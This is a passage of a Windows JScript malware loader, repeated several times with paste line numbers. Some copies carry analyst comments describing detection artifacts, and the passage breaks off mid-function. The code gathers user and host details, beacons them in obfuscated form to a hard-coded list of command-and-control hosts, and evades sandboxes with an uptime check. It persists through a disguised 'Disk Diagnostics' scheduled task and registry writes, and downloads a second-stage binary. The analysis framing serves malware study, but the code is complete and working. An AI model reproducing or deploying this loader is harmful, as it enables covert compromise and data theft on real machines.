Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
// Synchronous GET of `url`; returns the response body on HTTP 200 and "" on
// any other status or on exception. No headers are set, so the request goes
// out with the MSXML default User-Agent (presumably — TODO confirm on a
// capture), which is a useful discriminator against real browser traffic.
Http.Request = function(url){
try{
Http.Client.Open('GET', url, false);
Http.Client.Send();

if(Http.Client.Status == 200)
return Http.Client.ResponseText;
else
return "";
}catch(e){
return ""
}
}
  1189.  
  1190.  
// Host profile collected at load time and the check-in request builders.
var Loader = {};
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
Loader.Uptime = Windows.GetUptime();
// "true" when the computer name differs from the user domain, presumably a
// domain-joined heuristic; sent to the C2 as part of the profile.
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();

// Host identifier: DataTools.Hash over the profile plus version/sig, with
// SOFT_VERSION concatenated as a string suffix (hex hash followed by "32").
// Stable for a given user/host, so it also serves as the XOR-key input for
// second-stage downloads and as the dropped file name in DeployHost.
Loader.GetUid = function(){
return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}

// Builds the check-in payload: colon-joined profile fields, XOR'ed with the
// key derived from nonce + C2_OB_KEY, base64-encoded, then URL-encoded.
// Field order: username:pcname:domain:machinetype:uid:sig:version:uptime.
// Because the nonce travels in the same URL (`ubwG=`), a captured request
// can be fully decoded offline with the helpers in this file.
Loader.GetInitialRequest = function(nonce){
var uid = Loader.GetUid();
var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];

var sessionKey = nonce + config.C2_OB_KEY;
request = request.join(":");
request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
request = Base64Encode(request);

return encodeURIComponent(request);
}

// Returns the check-in path+query appended to each PRIMARY_C2 host:
// /rpc.aspx?winrm=2387&view2=classic&regclid=<payload>&client=<31 letters>
//   &service_id=FE0<1..10000>&ubwG=<12-letter nonce>
// The parameter names and the fixed `winrm=2387`/`view2=classic` pairs are
// static and suitable for proxy/IDS matching.
Loader.GetInitialEndpoint = function(){
var nonce = DataTools.Random.String(12)
var request = Loader.GetInitialRequest(nonce);

var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
return endpoint;
}
  1221.  
// Fetches a second-stage blob from SELECTED_C2 and drops it as
// %temp%\<uid>.bin; returns that path. Called at the end of Loader.Persist.
// Request shape (static parts are matchable):
//   /go.aspx?link=<4 letters>&goal=6E&r_ctplGuid=<enc uid>&TS2=<nonce>
//     &rtag=<"32"|"64">&e6_endpoint=29283291210281_2
// The response is XOR-decoded with the key derived from uid + C2_OB_KEY and
// then treated as base64. Nothing validates the response: an empty body
// (Http.Request returns "" on failure) still goes through Base64bytes and
// WriteBytes, so a zero-length .bin in %temp% is a plausible artifact of a
// failed download.
Loader.DeployHost = function(){
var temp = Windows.GetEnv("%temp%");
var architecture = Windows.GetArch();
var nonce = DataTools.Random.String(12);
var uid = Loader.GetUid();
var sessionKey = nonce + config.C2_OB_KEY;

var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
encodedId = Base64Encode(encodedId);
encodedId = encodeURIComponent(encodedId);

var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
// Download key is uid-based (no nonce), unlike the request key above.
pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));

var filename = uid.concat(".bin");

Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
return temp.concat("\\").concat(filename);

}
  1242.  
// Entry point when the script runs stand-alone (see the CLIENT_IMPORT_ENV
// check at the bottom of the file). Polls each PRIMARY_C2 host until one
// returns a body containing '<<<CLIENT__', then records the winning host and
// the uid in the registry and hands the decoded client to Loader.Persist.
Loader.DeployClient = function() {
// Uptime gate: exits silently on hosts up for <= 3000 seconds (~50 min),
// and also when GetUptime returned 0 because WMI was unavailable.
// Presumably an anti-sandbox measure — analysis VMs need a longer uptime
// (or a patched GetUptime) to observe the beacon.
if (Loader.Uptime <= 3000) {
WScript.Quit(0);
}

// C2_FAIL_COUNT (20) passes x 8 hosts, sleeping C2_REQUEST_SLEEP (21 s)
// after every attempt: bounded at 160 requests / about 56 minutes if every
// host fails. A fresh nonce/endpoint is generated per request.
for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
for (var j = 0; j < config.PRIMARY_C2.length; j++) {
try {
var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
// Response key is derived from uid + C2_OB_KEY, not from the request nonce.
response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));

// Marker prefix identifies a real client payload; everything after it is
// base64 text of the next-stage script.
if (response.indexOf('<<<CLIENT__') !== -1) {
var client = response.replace('<<<CLIENT__', '');
client = Base64text(client);

// Registry artifacts: ShimV4 = responding C2, SetupServiceKey = uid
// (both under GlobalStrings.REG_ROOT).
Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
Windows.RegWrite("SetupServiceKey", Loader.GetUid());

SELECTED_C2 = config.PRIMARY_C2[j];
Loader.Persist(client);
return;

}
} catch (e) {
// All errors are swallowed; the loop simply moves to the next host.
}

WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
}
}
}
  1274.  
// Installs persistence and stages the downloaded client. Observable
// artifacts, in order:
//   1. schtasks /Create /F /TN "Disk Diagnostics" /TR "explorer.exe
//      C:\Users\Public\Disk0.js" /SC Minute /MO 6   (child of wscript/cscript)
//   2. HKCU\...\Appsw64\ServerUrl   = decoded client script
//      HKCU\...\Appsw64\WebLib32    = full text of this running script
//   3. C:\Users\Public\diskdiag.ini (random filler, see Windows.CreateFile)
//   4. C:\Users\Public\Disk0.js     = decoded client script
//   5. second-stage download via Loader.DeployHost
// `client` is the base64-decoded text produced in Loader.DeployClient.
Loader.Persist = function(client){

var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);

Windows.Execute(taskCommand);
Windows.RegWrite("ServerUrl", client);
// Stores a copy of itself so a later stage can re-load this file from the
// registry without touching the original script path.
Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));

Windows.CreateFile(GlobalStrings.NTFILE_PATH);

Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);

Loader.DeployHost();
}
  1290.  
// Developer helper: shows `message` in a WScript.Shell popup. Not called
// anywhere in this copy of the script.
function debug(message){
ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
  1294.  
  1295.  
// Decodes a base64 string to UTF-8 text using the MSXML bin.base64 node type
// and an ADODB.Stream round-trip (binary write, then text read). Used by
// Loader.DeployClient to decode the client script. Bypasses ObjectProducer
// and creates the COM objects directly; the stream is never closed.
function Base64text(string){
var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
var element = XmlDOM.createElement("tempContainer");
element.dataType = "bin.Base64";
element.text = string;

var stream = WScript.CreateObject("ADODB.Stream");
// Type 1 = binary: accept the decoded bytes from nodeTypedValue.
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);

// Rewind and switch to Type 2 = text so the bytes can be read as UTF-8.
stream.Position = 0;
stream.Type = 2;
stream.CharSet = "utf-8";

return stream.ReadText();
}
  1313.  
// Converts a JScript string to a byte array (ADODB.Stream.Read result) by
// writing it as ASCII text and re-reading the stream in binary mode.
// Non-ASCII characters are subject to the "ascii" charset conversion.
// The second `Position = 0` is redundant; the stream is never closed.
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2;
BinaryStream.CharSet = "ascii";
BinaryStream.Open();
BinaryStream.WriteText(string);
BinaryStream.Position = 0;
BinaryStream.Type = 1;
BinaryStream.Position = 0;
return BinaryStream.Read();
}
  1325.  
  1326.  
// Decodes a base64 string into an OPEN binary ADODB.Stream and returns the
// stream itself (position left at end). The caller is responsible for
// SaveToFile/Close — see Windows.WriteBytes, the only consumer, which drops
// the result as %temp%\<uid>.bin.
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";

element.text = string;

var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();

stream.Write(element.nodeTypedValue);
return stream;
}
  1341.  
// Base64-encodes `string` via StringToBinary and the MSXML bin.base64 node
// type, then strips newlines (MSXML line-wraps its output) and every "//"
// sequence. Removing "//" is lossy: any encoding whose alphabet output
// happens to contain two adjacent slashes is altered, so a server-side
// decoder must tolerate that. Used for the check-in payload and the uid in
// Loader.DeployHost.
function Base64Encode(string) {

var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";

element.nodeTypedValue = StringToBinary(string);

return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
  1352.  
  1353.  
// Auto-run guard: DeployClient fires only when CLIENT_IMPORT_ENV is not
// defined, i.e. when this file executes on its own. Presumably a wrapper
// that eval()s this text defines CLIENT_IMPORT_ENV first so it can reuse
// the objects above without beaconing — TODO confirm against the wrapper.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
Loader.DeployClient();
}
  1357. var config = {
  1358. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  1359. SOFT_SIG : 'mad29',
  1360. SOFT_VERSION: 32,
  1361. C2_REQUEST_SLEEP : 21,
  1362. C2_FAIL_SLEEP : 21,
  1363. C2_FAIL_COUNT : 20,
  1364. C2_OB_KEY : 'JxTRG4mY',
  1365.  
  1366.  
  1367. C2_PREFIX : 'rpc.aspx'
  1368. }
  1369.  
  1370.  
  1371. var SELECTED_C2 = config.PRIMARY_C2[0];
  1372.  
  1373.  
  1374. Math.imul = function (a, b) {
  1375. var ah = (a >>> 16) & 0xffff;
  1376. var al = a & 0xffff;
  1377. var bh = (b >>> 16) & 0xffff;
  1378. var bl = b & 0xffff;
  1379. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  1380. };
  1381.  
  1382.  
  1383. var GlobalStrings = {
  1384. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  1385. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  1386. WMIC_EXEC : "wmic process call create \"%path%\"",
  1387. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  1388. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  1389. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  1390. ADS_SSID : "HDDScan",
  1391. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  1392. TASK_NAME : "Disk Diagnostics"
  1393. }
  1394.  
  1395.  
  1396. var ObjectProducer = {}
  1397. ObjectProducer.AccesibleObjects = {
  1398. MAIN_SH_OBJECT : 'WScript.Shell',
  1399. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  1400. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  1401. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  1402. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  1403. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  1404. };
  1405.  
  1406. ObjectProducer.GetRootConstructor = function(){
  1407. return ActiveXObject;
  1408. }
  1409.  
  1410. ObjectProducer.GetInstance = function(instanceKey){
  1411. var rootConstructor = ObjectProducer.GetRootConstructor();
  1412. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  1413. }
  1414.  
  1415.  
  1416.  
  1417. var DataTools = {};
  1418. DataTools.KEY_BASE = 1029;
  1419.  
  1420. DataTools.DeriveKey = function(keyStr){
  1421. var keyBase = DataTools.KEY_BASE;
  1422. var key = 0;
  1423.  
  1424. for(var i = 0; i < keyStr.length; i++){
  1425. keyBase = keyBase ^ keyStr.charCodeAt(i);
  1426. }
  1427.  
  1428. var _keyBase = keyBase.toString();
  1429. for(var i = 0; i < _keyBase.length; i++){
  1430. key += parseInt(_keyBase.charAt(i));
  1431. }
  1432.  
  1433. return key;
  1434. }
  1435.  
  1436. DataTools.RotString = function(str, key){
  1437. var rotd = "";
  1438. for(var i = 0; i < str.length; i++){
  1439. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  1440. }
  1441.  
  1442. return rotd;
  1443. }
  1444.  
  1445. DataTools.Hash = function(str){
  1446. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  1447. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  1448.  
  1449. return ((h ^ h >>> 16) >>> 0).toString(16);
  1450. }
  1451.  
  1452. DataTools.Random = {};
  1453. DataTools.Random.Number = function(min, max){
  1454. min = Math.ceil(min);
  1455. max = Math.floor(max);
  1456. return Math.floor(Math.random() * (max - min + 1)) + min;
  1457. }
  1458.  
  1459. DataTools.Random.String = function(len){
  1460. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  1461. var result = "";
  1462. for(var i = 0; i < len; i++){
  1463. var chr = DataTools.Random.Number(0, alphabet.length-1);
  1464. result = result.concat(alphabet.charAt(chr));
  1465. }
  1466.  
  1467. return result;
  1468. }
  1469.  
  1470.  
  1471. DataTools.Strings = {};
  1472. DataTools.Strings.ParseTemplate = function(str, templateStr){
  1473. var template = templateStr.split('&');
  1474. for(var i = 0; i < template.length; i++){
  1475. var keyValue = template[i].split('=');
  1476. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  1477. }
  1478.  
  1479. return str;
  1480. }
  1481.  
  1482. var Windows = {};
  1483. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  1484. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  1485.  
  1486. Windows.Execute = function(command){
  1487. Windows.CoMainObject.Run(command);
  1488. }
  1489.  
  1490. Windows.GetEnv = function(env){
  1491. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  1492. }
  1493.  
  1494. Windows.RegRead = function(path){
  1495. return Windows.CoMainObject.RegRead(path);
  1496. }
  1497.  
  1498. Windows.RegWrite = function(entry, value){
  1499. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  1500. }
  1501.  
  1502. Windows.CreateFile = function(path){
  1503. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  1504. fHandle.WriteLine(DataTools.Random.String(1024));
  1505. fHandle.Close();
  1506. }
  1507.  
  1508. Windows.AppendDataStream = function(path, stream, data){
  1509. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  1510. fHandle.WriteLine(data);
  1511. fHandle.Close();
  1512. }
  1513.  
  1514. Windows.AppendDataStreamB = function(path, stream, data){
  1515. data.SaveToFile(path.concat(":").concat(stream), 2);
  1516. data.Close();
  1517. }
  1518.  
  1519. Windows.WriteData = function(path, data){
  1520. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  1521. fHandle.Write(data);
  1522. fHandle.Close();
  1523. }
  1524.  
  1525. Windows.WriteBytes = function(path, data){
  1526. data.SaveToFile(path, 2);
  1527. data.Close();
  1528. }
  1529.  
  1530. Windows.WriteDataStreamBytes = function(path, stream, data){
  1531. data.SaveToFile(path.concat(":").concat(stream), 2);
  1532. data.Close();
  1533. }
  1534.  
  1535. Windows.ReadFile = function(path){
  1536. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  1537. return fHandle.ReadAll();
  1538. }
  1539.  
  1540. Windows.GetWMIProvider = function(pcname){
  1541. return GetObject("winmgmts:"+
  1542. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  1543. }
  1544.  
  1545. Windows.GetUptime = function(){
  1546. try{
  1547. var wmi = Windows.GetWMIProvider(".");
  1548. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  1549. var e = new Enumerator(queryResult);
  1550.  
  1551. return parseInt(e.item().SystemUpTime);
  1552. }catch(e){
  1553. return 0;
  1554. }
  1555. }
  1556.  
  1557. Windows.GetArch = function(){
  1558. var architecture = "64";
  1559. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  1560.  
  1561. if(product.indexOf('Windows 7') != -1){
  1562. architecture = "32";
  1563. }
  1564.  
  1565. return architecture;
  1566. }
  1567.  
  1568.  
  1569. var Http = {};
  1570. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  1571. Http.Request = function(url){
  1572. try{
  1573. Http.Client.Open('GET', url, false);
  1574. Http.Client.Send();
  1575.  
  1576. if(Http.Client.Status == 200)
  1577. return Http.Client.ResponseText;
  1578. else
  1579. return "";
  1580. }catch(e){
  1581. return ""
  1582. }
  1583. }
  1584.  
  1585.  
  1586. var Loader = {};
  1587. Loader.USERNAME = Windows.GetEnv("%username%");
  1588. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  1589. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  1590. Loader.Uptime = Windows.GetUptime();
  1591. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  1592.  
  1593. Loader.GetUid = function(){
  1594. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  1595. }
  1596.  
  1597. Loader.GetInitialRequest = function(nonce){
  1598. var uid = Loader.GetUid();
  1599. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  1600.  
  1601. var sessionKey = nonce + config.C2_OB_KEY;
  1602. request = request.join(":");
  1603. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  1604. request = Base64Encode(request);
  1605.  
  1606. return encodeURIComponent(request);
  1607. }
  1608.  
  1609. Loader.GetInitialEndpoint = function(){
  1610. var nonce = DataTools.Random.String(12)
  1611. var request = Loader.GetInitialRequest(nonce);
  1612.  
  1613. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  1614. return endpoint;
  1615. }
  1616.  
  1617. Loader.DeployHost = function(){
  1618. var temp = Windows.GetEnv("%temp%");
  1619. var architecture = Windows.GetArch();
  1620. var nonce = DataTools.Random.String(12);
  1621. var uid = Loader.GetUid();
  1622. var sessionKey = nonce + config.C2_OB_KEY;
  1623.  
  1624. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  1625. encodedId = Base64Encode(encodedId);
  1626. encodedId = encodeURIComponent(encodedId);
  1627.  
  1628. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  1629. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  1630.  
  1631. var filename = uid.concat(".bin");
  1632.  
  1633. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  1634. return temp.concat("\\").concat(filename);
  1635.  
  1636. }
  1637.  
  1638. Loader.DeployClient = function() {
  1639. if (Loader.Uptime <= 3000) {
  1640. WScript.Quit(0);
  1641. }
  1642.  
  1643. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  1644. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  1645. try {
  1646. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  1647. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  1648.  
  1649. if (response.indexOf('<<<CLIENT__') !== -1) {
  1650. var client = response.replace('<<<CLIENT__', '');
  1651. client = Base64text(client);
  1652.  
  1653. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  1654. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  1655.  
  1656. SELECTED_C2 = config.PRIMARY_C2[j];
  1657. Loader.Persist(client);
  1658. return;
  1659.  
  1660. }
  1661. } catch (e) {
  1662.  
  1663. }
  1664.  
  1665. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  1666. }
  1667. }
  1668. }
  1669.  
  1670. Loader.Persist = function(client){
  1671.  
  1672. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  1673. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  1674.  
  1675. Windows.Execute(taskCommand);
  1676. Windows.RegWrite("ServerUrl", client);
  1677. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  1678.  
  1679. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  1680.  
  1681. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  1682.  
  1683. Loader.DeployHost();
  1684. }
  1685.  
  1686. function debug(message){
  1687. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  1688. }
  1689.  
  1690.  
  1691. function Base64text(string){
  1692. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  1693. var element = XmlDOM.createElement("tempContainer");
  1694. element.dataType = "bin.Base64";
  1695. element.text = string;
  1696.  
  1697. var stream = WScript.CreateObject("ADODB.Stream");
  1698. stream.Type = 1;
  1699. stream.Open();
  1700. stream.Write(element.nodeTypedValue);
  1701.  
  1702. stream.Position = 0;
  1703. stream.Type = 2;
  1704. stream.CharSet = "utf-8";
  1705.  
  1706. return stream.ReadText();
  1707. }
  1708.  
  1709. function StringToBinary(string){
  1710. var BinaryStream = new ActiveXObject("ADODB.Stream");
  1711. BinaryStream.Type = 2;
  1712. BinaryStream.CharSet = "ascii";
  1713. BinaryStream.Open();
  1714. BinaryStream.WriteText(string);
  1715. BinaryStream.Position = 0;
  1716. BinaryStream.Type = 1;
  1717. BinaryStream.Position = 0;
  1718. return BinaryStream.Read();
  1719. }
  1720.  
  1721.  
  1722. function Base64bytes(string){
  1723. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  1724. var element = XmlDOM.createElement("Base64Data");
  1725. element.dataType = "bin.base64";
  1726.  
  1727. element.text = string;
  1728.  
  1729. var stream = WScript.CreateObject("ADODB.Stream");
  1730. stream.Type = 1;
  1731. stream.Open();
  1732.  
  1733. stream.Write(element.nodeTypedValue);
  1734. return stream;
  1735. }
  1736.  
  1737. function Base64Encode(string) {
  1738.  
  1739. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  1740. var element = XmlDOM.createElement("Base64Data");
  1741. element.dataType = "bin.base64";
  1742.  
  1743. element.nodeTypedValue = StringToBinary(string);
  1744.  
  1745. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  1746. }
  1747.  
  1748.  
  1749. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  1750. Loader.DeployClient();
  1751. }
  1752. var config = {
  1753. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  1754. SOFT_SIG : 'mad29',
  1755. SOFT_VERSION: 32,
  1756. C2_REQUEST_SLEEP : 21,
  1757. C2_FAIL_SLEEP : 21,
  1758. C2_FAIL_COUNT : 20,
  1759. C2_OB_KEY : 'JxTRG4mY',
  1760.  
  1761.  
  1762. C2_PREFIX : 'rpc.aspx'
  1763. }
  1764.  
  1765.  
  1766. var SELECTED_C2 = config.PRIMARY_C2[0];
  1767.  
  1768.  
  1769. Math.imul = function (a, b) {
  1770. var ah = (a >>> 16) & 0xffff;
  1771. var al = a & 0xffff;
  1772. var bh = (b >>> 16) & 0xffff;
  1773. var bl = b & 0xffff;
  1774. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  1775. };
  1776.  
  1777.  
  1778. var GlobalStrings = {
  1779. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  1780. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  1781. WMIC_EXEC : "wmic process call create \"%path%\"",
  1782. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  1783. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  1784. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  1785. ADS_SSID : "HDDScan",
  1786. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  1787. TASK_NAME : "Disk Diagnostics"
  1788. }
  1789.  
  1790.  
  1791. var ObjectProducer = {}
  1792. ObjectProducer.AccesibleObjects = {
  1793. MAIN_SH_OBJECT : 'WScript.Shell',
  1794. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  1795. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  1796. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  1797. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  1798. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  1799. };
  1800.  
  1801. ObjectProducer.GetRootConstructor = function(){
  1802. return ActiveXObject;
  1803. }
  1804.  
  1805. ObjectProducer.GetInstance = function(instanceKey){
  1806. var rootConstructor = ObjectProducer.GetRootConstructor();
  1807. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  1808. }
  1809.  
  1810.  
  1811.  
  // DataTools: the loader's string obfuscation / encoding helpers.
  1812. var DataTools = {};
  // Seed for DeriveKey; every character of the key string is XORed into it.
  1813. DataTools.KEY_BASE = 1029;
  1814.  
  // Derives the integer XOR key used by RotString: XOR-fold keyStr's char
  // codes into KEY_BASE, then sum the decimal digits of the result. The key
  // is therefore tiny (the digit sum of a value below 65536 — two digits at
  // most), which makes RotString output trivially brute-forceable from a
  // packet capture.
  1815. DataTools.DeriveKey = function(keyStr){
  1816. var keyBase = DataTools.KEY_BASE;
  1817. var key = 0;
  1818.  
  1819. for(var i = 0; i < keyStr.length; i++){
  1820. keyBase = keyBase ^ keyStr.charCodeAt(i);
  1821. }
  1822.  
  1823. var _keyBase = keyBase.toString();
  1824. for(var i = 0; i < _keyBase.length; i++){
  1825. key += parseInt(_keyBase.charAt(i));
  1826. }
  1827.  
  1828. return key;
  1829. }
  1830.  
  // XORs every UTF-16 code unit of str with key. XOR is its own inverse, so
  // this one function both obfuscates outgoing data and decodes C2 responses.
  1831. DataTools.RotString = function(str, key){
  1832. var rotd = "";
  1833. for(var i = 0; i < str.length; i++){
  1834. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  1835. }
  1836.  
  1837. return rotd;
  1838. }
  1839.  
  // 32-bit multiplicative hash: seed 0xdeadbeef, per character
  // h = imul(h ^ c, 2654435761), final h ^ (h >>> 16), returned as lowercase
  // hex. Feeds the victim id in Loader.GetUid and relies on the Math.imul
  // polyfill assigned later in the file.
  1840. DataTools.Hash = function(str){
  1841. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  1842. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  1843.  
  1844. return ((h ^ h >>> 16) >>> 0).toString(16);
  1845. }
  1846.  
  // Random helpers built on Math.random (not cryptographic); the per-request
  // "nonce" produced from these is therefore not a real secret.
  1847. DataTools.Random = {};
  // Uniform integer in [ceil(min), floor(max)].
  1848. DataTools.Random.Number = function(min, max){
  1849. min = Math.ceil(min);
  1850. max = Math.floor(max);
  1851. return Math.floor(Math.random() * (max - min + 1)) + min;
  1852. }
  1853.  
  // Random string of len lowercase letters; used for URL padding parameters,
  // the session nonce and the contents of the decoy file.
  1854. DataTools.Random.String = function(len){
  1855. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  1856. var result = "";
  1857. for(var i = 0; i < len; i++){
  1858. var chr = DataTools.Random.Number(0, alphabet.length-1);
  1859. result = result.concat(alphabet.charAt(chr));
  1860. }
  1861.  
  1862. return result;
  1863. }
  1864.  
  1865.  
  // String helpers.
  1866. DataTools.Strings = {};
  // Substitutes %key% placeholders in str from a "k1=v1&k2=v2" templateStr.
